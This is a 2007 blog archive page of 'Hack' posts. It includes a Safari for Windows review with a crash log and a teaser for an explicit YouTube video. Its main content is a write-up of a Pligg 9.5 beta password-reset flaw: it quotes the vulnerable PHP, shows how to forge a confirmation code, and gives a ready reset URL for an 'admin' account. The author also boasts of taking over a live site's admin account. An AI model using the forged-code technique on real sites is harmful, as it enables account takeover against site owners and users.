Archive for Hack

Monty Hall Problem Statistics Algorithm

By Cugone ( July 17, 2009 at 5:14 am) · Filed under Hack

Goat behind door number 3Today the goats made it to the front page of reddit yet again, this time it’s a forum post with over 9000 replies.

How many goats can you win?

Comments (1)

Top 5 Strange Google Links

By Cugone ( June 17, 2007 at 7:04 am) · Filed under Hack, SEO

Google Dilbert Logo - Doodle

You choose!

View Results

Other strange and funny google links:

Comments (2)

Safari For Windows – Quick Review

By Cugone ( June 11, 2007 at 8:07 pm) · Filed under Hack

About 10 seconds after starting up Apple’s Safari for Windows I decide to click the small cross (+) button available on the Toolbar. Here’s what it does:

Safari For Windows Crash Safari For Windows Crash Details

This happens every single time I click it. What does it do anyway? Bookmarks?

It also crashes when I use the search box on apple.com. The browser looks awesome and it’s pretty fast too, but I think they rushed the Beta.

I dislike that Opera was rated as slowest in the HTML performance benchmark with 6.22 seconds after IE7 with 4.63. That’s marketing bullshit.

Apparently it passes the Acid2 Test, but after refreshing the page it somehow fails. What’s up with that?

Apple Safari Passes Acid2 Test Apple Safari Passes Acid2 Test

Overall I think Safari for Windows is going to be a nice browser, but right it’s only useful for apple junkies. Definitely not better than Opera or FireFox.Overall score: 2/5

The + crash error log:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<?xml version="1.0" encoding="UTF-16"?>
<DATABASE>
<EXE NAME="Safari.exe" FILTER="GRABMI_FILTER_PRIVACY">
    <MATCHING_FILE NAME="CFNetwork.dll" SIZE="409600" CHECKSUM="0x3C854DEC" BIN_FILE_VERSION="1.185.6.0" BIN_PRODUCT_VERSION="1.185.6.0" PRODUCT_VERSION="1, 185, 6, 0" FILE_DESCRIPTION="CFNetwork" COMPANY_NAME="Apple Computer, Inc." PRODUCT_NAME=" CFNetwork" FILE_VERSION="1, 185, 6, 0" ORIGINAL_FILENAME="CFNetwork.dll" INTERNAL_NAME="CFNetwork" LEGAL_COPYRIGHT="Copyright (C) 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x682BC" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="1.185.6.0" UPTO_BIN_PRODUCT_VERSION="1.185.6.0" LINK_DATE="06/10/2007 16:26:39" UPTO_LINK_DATE="06/10/2007 16:26:39" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="CoreFoundation.dll" SIZE="458752" CHECKSUM="0x59422635" BIN_FILE_VERSION="1.434.6.0" BIN_PRODUCT_VERSION="1.434.6.0" PRODUCT_VERSION="1, 434, 6, 0" FILE_DESCRIPTION="CoreFoundation" COMPANY_NAME="Apple Computer, Inc." PRODUCT_NAME="CoreFoundation" FILE_VERSION="1, 434, 6, 0" ORIGINAL_FILENAME="CoreFoundation.dll" INTERNAL_NAME="CoreFoundation" LEGAL_COPYRIGHT="Copyright (C) 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x7E817" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="1.434.6.0" UPTO_BIN_PRODUCT_VERSION="1.434.6.0" LINK_DATE="06/10/2007 16:21:12" UPTO_LINK_DATE="06/10/2007 16:21:12" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="CoreGraphics.dll" SIZE="3588096" CHECKSUM="0x678E2320" BIN_FILE_VERSION="1.0.20.0" BIN_PRODUCT_VERSION="1.0.20.0" PRODUCT_VERSION="1.0.20.0" FILE_DESCRIPTION="CoreGraphics DLL" COMPANY_NAME="Apple Computer, Inc." PRODUCT_NAME=" CoreGraphics" FILE_VERSION="1.0.20.0" ORIGINAL_FILENAME="CoreGraphics.dll" INTERNAL_NAME="CoreGraphics" LEGAL_COPYRIGHT="© 2006 Apple Computer, Inc. All Rights Reserved." VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x37050F" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="1.0.20.0" UPTO_BIN_PRODUCT_VERSION="1.0.20.0" LINK_DATE="06/01/2007 22:53:58" UPTO_LINK_DATE="06/01/2007 22:53:58" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="icudt36.dll" SIZE="8822784" CHECKSUM="0x516F586C" BIN_FILE_VERSION="3.6.0.0" BIN_PRODUCT_VERSION="3.6.0.0" PRODUCT_VERSION="3, 6, 0, 0" FILE_DESCRIPTION="ICU Data DLL" COMPANY_NAME="IBM Corporation and others" PRODUCT_NAME="International Components for Unicode" FILE_VERSION="3, 6, 0, 0" ORIGINAL_FILENAME="icudt36.dll" LEGAL_COPYRIGHT=" Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. " VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x0" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.6.0.0" UPTO_BIN_PRODUCT_VERSION="3.6.0.0" LINK_DATE="04/26/2007 21:48:56" UPTO_LINK_DATE="04/26/2007 21:48:56" VER_LANGUAGE="Language Neutral [0x0]" />
    <MATCHING_FILE NAME="icuin36.dll" SIZE="679936" CHECKSUM="0x957D5A01" BIN_FILE_VERSION="3.6.0.0" BIN_PRODUCT_VERSION="3.6.0.0" PRODUCT_VERSION="3, 6, 0, 0" FILE_DESCRIPTION="IBM ICU I18N DLL" COMPANY_NAME="IBM Corporation and others" PRODUCT_NAME="International Components for Unicode" FILE_VERSION="3, 6, 0, 0" ORIGINAL_FILENAME="icuin36.dll" LEGAL_COPYRIGHT=" Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. " VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0xAF142" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.6.0.0" UPTO_BIN_PRODUCT_VERSION="3.6.0.0" LINK_DATE="04/26/2007 21:47:27" UPTO_LINK_DATE="04/26/2007 21:47:27" VER_LANGUAGE="Language Neutral [0x0]" />
    <MATCHING_FILE NAME="icuuc36.dll" SIZE="1024000" CHECKSUM="0xD3DD62B5" BIN_FILE_VERSION="3.6.0.0" BIN_PRODUCT_VERSION="3.6.0.0" PRODUCT_VERSION="3, 6, 0, 0" FILE_DESCRIPTION="IBM ICU Common DLL" COMPANY_NAME="IBM Corporation and others" PRODUCT_NAME="International Components for Unicode" FILE_VERSION="3, 6, 0, 0" ORIGINAL_FILENAME="icuuc36.dll" LEGAL_COPYRIGHT=" Copyright (C) 2005, International Business Machines Corporation and others. All Rights Reserved. " VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x105F84" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.6.0.0" UPTO_BIN_PRODUCT_VERSION="3.6.0.0" LINK_DATE="04/26/2007 21:47:03" UPTO_LINK_DATE="04/26/2007 21:47:03" VER_LANGUAGE="Language Neutral [0x0]" />
    <MATCHING_FILE NAME="libtidy.dll" SIZE="319488" CHECKSUM="0x49F1708C" MODULE_TYPE="WIN32" PE_CHECKSUM="0x57305" LINKER_VERSION="0x0" LINK_DATE="06/05/2007 16:03:32" UPTO_LINK_DATE="06/05/2007 16:03:32" />
    <MATCHING_FILE NAME="libxml2.dll" SIZE="1055232" CHECKSUM="0x25DBA50F" MODULE_TYPE="WIN32" PE_CHECKSUM="0x107C08" LINKER_VERSION="0x20006" LINK_DATE="03/02/2007 08:30:07" UPTO_LINK_DATE="03/02/2007 08:30:07" />
    <MATCHING_FILE NAME="libxslt.dll" SIZE="197632" CHECKSUM="0xF33FEB3" MODULE_TYPE="WIN32" PE_CHECKSUM="0x3FD32" LINKER_VERSION="0x10001" LINK_DATE="06/05/2007 16:01:57" UPTO_LINK_DATE="06/05/2007 16:01:57" />
    <MATCHING_FILE NAME="pthreadVC2.dll" SIZE="47616" CHECKSUM="0xFB68A268" BIN_FILE_VERSION="2.7.0.0" BIN_PRODUCT_VERSION="2.7.0.0" PRODUCT_VERSION="2, 7, 0, 0" FILE_DESCRIPTION="POSIX Threads for Windows32 Library" COMPANY_NAME="Open Source Software community project" FILE_VERSION="2, 7, 0, 0" ORIGINAL_FILENAME="pthreadVC" INTERNAL_NAME="pthreadVC" LEGAL_COPYRIGHT="Copyright (C) Project contributors 1998-2004" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x11EF9" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="2.7.0.0" UPTO_BIN_PRODUCT_VERSION="2.7.0.0" LINK_DATE="04/16/2007 18:14:23" UPTO_LINK_DATE="04/16/2007 18:14:23" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="PubSubDLL.dll" SIZE="516096" CHECKSUM="0xC6B28210" MODULE_TYPE="WIN32" PE_CHECKSUM="0x8BDD8" LINKER_VERSION="0x0" LINK_DATE="06/10/2007 17:49:07" UPTO_LINK_DATE="06/10/2007 17:49:07" />
    <MATCHING_FILE NAME="Safari.exe" SIZE="1551936" CHECKSUM="0x2C8105F1" BIN_FILE_VERSION="3.522.11.3" BIN_PRODUCT_VERSION="3.0.0.0" PRODUCT_VERSION="3.0 (522.11.3)" FILE_DESCRIPTION="Safari Web Browser" COMPANY_NAME="Apple Inc." PRODUCT_NAME="Safari" FILE_VERSION="3.0 (522.11.3)" ORIGINAL_FILENAME="Safari.exe" INTERNAL_NAME="Safari" LEGAL_COPYRIGHT="Copyright Apple Inc. 2006, 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x17B3DF" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.522.11.3" UPTO_BIN_PRODUCT_VERSION="3.0.0.0" LINK_DATE="06/10/2007 18:03:24" UPTO_LINK_DATE="06/10/2007 18:03:24" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="SafariTheme.dll" SIZE="172032" CHECKSUM="0x6B67050C" BIN_FILE_VERSION="3.522.11.3" BIN_PRODUCT_VERSION="3.0.0.0" PRODUCT_VERSION="3.0 (522.11.3)" FILE_DESCRIPTION="SafariTheme Dynamic Link Library" COMPANY_NAME="Apple Inc." PRODUCT_NAME="SafariTheme" FILE_VERSION="3.0 (522.11.3)" ORIGINAL_FILENAME="SafariTheme.dll" INTERNAL_NAME="SafariTheme" LEGAL_COPYRIGHT="Copyright (C) 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x0" MODULE_TYPE="WIN32" PE_CHECKSUM="0x36376" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.522.11.3" UPTO_BIN_PRODUCT_VERSION="3.0.0.0" LINK_DATE="06/10/2007 16:27:52" UPTO_LINK_DATE="06/10/2007 16:27:52" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="SQLite3.dll" SIZE="352256" CHECKSUM="0xE8BEED48" MODULE_TYPE="WIN32" PE_CHECKSUM="0x5FEB4" LINKER_VERSION="0x0" LINK_DATE="06/05/2007 16:03:25" UPTO_LINK_DATE="06/05/2007 16:03:25" />
    <MATCHING_FILE NAME="WebKit.dll" SIZE="3903488" CHECKSUM="0x126C5E55" BIN_FILE_VERSION="3.522.11.3" BIN_PRODUCT_VERSION="3.0.0.0" PRODUCT_VERSION="522.11.3" FILE_DESCRIPTION="WebKit Dynamic Link Library" COMPANY_NAME="Apple Inc." PRODUCT_NAME=" WebKit" FILE_VERSION="3.0 (522.11.3)" ORIGINAL_FILENAME="WebKit.dll" INTERNAL_NAME="WebKit" LEGAL_COPYRIGHT="Copyright Apple Inc. 2006, 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x3C7F2E" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.522.11.3" UPTO_BIN_PRODUCT_VERSION="3.0.0.0" LINK_DATE="06/10/2007 17:37:37" UPTO_LINK_DATE="06/10/2007 17:37:37" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="zlib1.dll" SIZE="62464" CHECKSUM="0x537F5F1E" BIN_FILE_VERSION="1.2.2.0" BIN_PRODUCT_VERSION="1.2.2.0" PRODUCT_VERSION="1.2.3" FILE_DESCRIPTION="zlib data compression library" PRODUCT_NAME="zlib" FILE_VERSION="1.2.3" ORIGINAL_FILENAME="zlib1.dll" INTERNAL_NAME="zlib1.dll" LEGAL_COPYRIGHT="(C) 1995-2004 Jean-loup Gailly &amp; Mark Adler" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x10004" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x16860" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="1.2.2.0" UPTO_BIN_PRODUCT_VERSION="1.2.2.0" LINK_DATE="06/05/2007 16:03:34" UPTO_LINK_DATE="06/05/2007 16:03:34" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="Plugins\npJavaPlugin.dll" SIZE="13824" CHECKSUM="0x80A93A9B" BIN_FILE_VERSION="3.522.11.3" BIN_PRODUCT_VERSION="3.0.0.0" PRODUCT_VERSION="3.0 (522.11.3)" FILE_DESCRIPTION="Apple Java Plug-In" COMPANY_NAME="Apple Inc." PRODUCT_NAME="Apple Java Plug-In" FILE_VERSION="3.0 (522.11.3)" ORIGINAL_FILENAME="npJavaPlugin.dll" INTERNAL_NAME="Apple Java Plug-In" LEGAL_COPYRIGHT="Copyright (C) 2006, 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x0" MODULE_TYPE="WIN32" PE_CHECKSUM="0x11296" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.522.11.3" UPTO_BIN_PRODUCT_VERSION="3.0.0.0" LINK_DATE="06/10/2007 17:50:28" UPTO_LINK_DATE="06/10/2007 17:50:28" VER_LANGUAGE="English (United States) [0x409]" />
    <MATCHING_FILE NAME="Safari.resources\en.lproj\SafariResources.dll" SIZE="2093056" CHECKSUM="0xBBFE6551" BIN_FILE_VERSION="3.522.11.3" BIN_PRODUCT_VERSION="3.0.0.0" PRODUCT_VERSION="3.0 (522.11.3)" FILE_DESCRIPTION="Safari Resources" COMPANY_NAME="Apple Inc." PRODUCT_NAME="Safari" FILE_VERSION="3.0 (522.11.3)" ORIGINAL_FILENAME="SafariResources.dll" INTERNAL_NAME="Safari Resources" LEGAL_COPYRIGHT="Copyright Apple Inc. 2006, 2007" VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x2052FD" LINKER_VERSION="0x0" UPTO_BIN_FILE_VERSION="3.522.11.3" UPTO_BIN_PRODUCT_VERSION="3.0.0.0" LINK_DATE="06/10/2007 18:03:34" UPTO_LINK_DATE="06/10/2007 18:03:34" VER_LANGUAGE="English (United States) [0x409]" />
</EXE>
<EXE NAME="kernel32.dll" FILTER="GRABMI_FILTER_THISFILEONLY">
    <MATCHING_FILE NAME="kernel32.dll" SIZE="985600" CHECKSUM="0xE7E1F9DC" BIN_FILE_VERSION="5.1.2600.2991" BIN_PRODUCT_VERSION="5.1.2600.2991" PRODUCT_VERSION="5.1.2600.2991" FILE_DESCRIPTION="Windows NT BASE API Client DLL" COMPANY_NAME="Microsoft Corporation" PRODUCT_NAME="Microsoft® Windows® Operating System" FILE_VERSION="5.1.2600.2991 (xpsp.060907-0105)" ORIGINAL_FILENAME="kernel32" INTERNAL_NAME="kernel32" LEGAL_COPYRIGHT="© Microsoft Corporation. All rights reserved." VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x40004" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0xF39C9" LINKER_VERSION="0x50001" UPTO_BIN_FILE_VERSION="5.1.2600.2991" UPTO_BIN_PRODUCT_VERSION="5.1.2600.2991" LINK_DATE="09/07/2006 11:59:20" UPTO_LINK_DATE="09/07/2006 11:59:20" VER_LANGUAGE="English (United States) [0x409]" />
</EXE>
</DATABASE>

Comments (1)

YouTube Porn – The seX Video

By Cugone ( June 2, 2007 at 10:55 am) · Filed under Hack

YouTube Logo
Warning: The following material is sexually explicit.
Exit now if you are under 18 years old!

On their mission to take down 9/11 conspiracy videos, YouTube forgot to erase this pornographic video. At the time of this post, the clip made it to the YouTube most popular list on page 4 with 16,385 views. Should YouTube expect a …read more…

Comments (4)

Hacking Pligg 9.5 beta – Exploit

By Cugone ( May 27, 2007 at 7:15 am) · Filed under Hack

PliggPligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com

A security flaw makes it possible to change the password of any user and log in.

VideoSift is Hacked! VideoSift is one of the largest (still small) websites that uses Pligg.

Admin Charter - VideoSift Changing God’s Password - VideoSift

How it works:
To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user mail box. The user has to follow the link containing the confirmation code and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value.

you can find a part of the source code in charge of this check below :

pligg_dir/libs/html1.php:

1
2
3
4
5
6
7
8
9

function generateHash($plainText, $salt = null){
  if ($salt === null) { 
    $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
  }
  else {
    $salt = substr($salt, 0, SALT_LENGTH); 
  }
  return $salt . sha1($salt . $plainText);
}

pligg_dir/login.php :

1
2
3

$confirmationcode = $_GET["confirmationcode"];
if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){
  $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`= "'.$username.'"');

Unfortunately you can easily generate, for a given username, a confirmation code that passes successfully the check on line 2 above.

Example:

salt = 123456789 and username = admin

we have:

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and thus:

$confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

with the following URL you can reinitialize the user “admin” password:

http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

Pligg Forum members have been notified about it via e-mail this morning. Most Pligg webmasters have’t signed up for the forum :( .
All Pligg websites I tried were vulnerable to this exploit. There is no commercial value for me, so don’t worry, administrators have been notified that it’s time to patch.

Comments (6)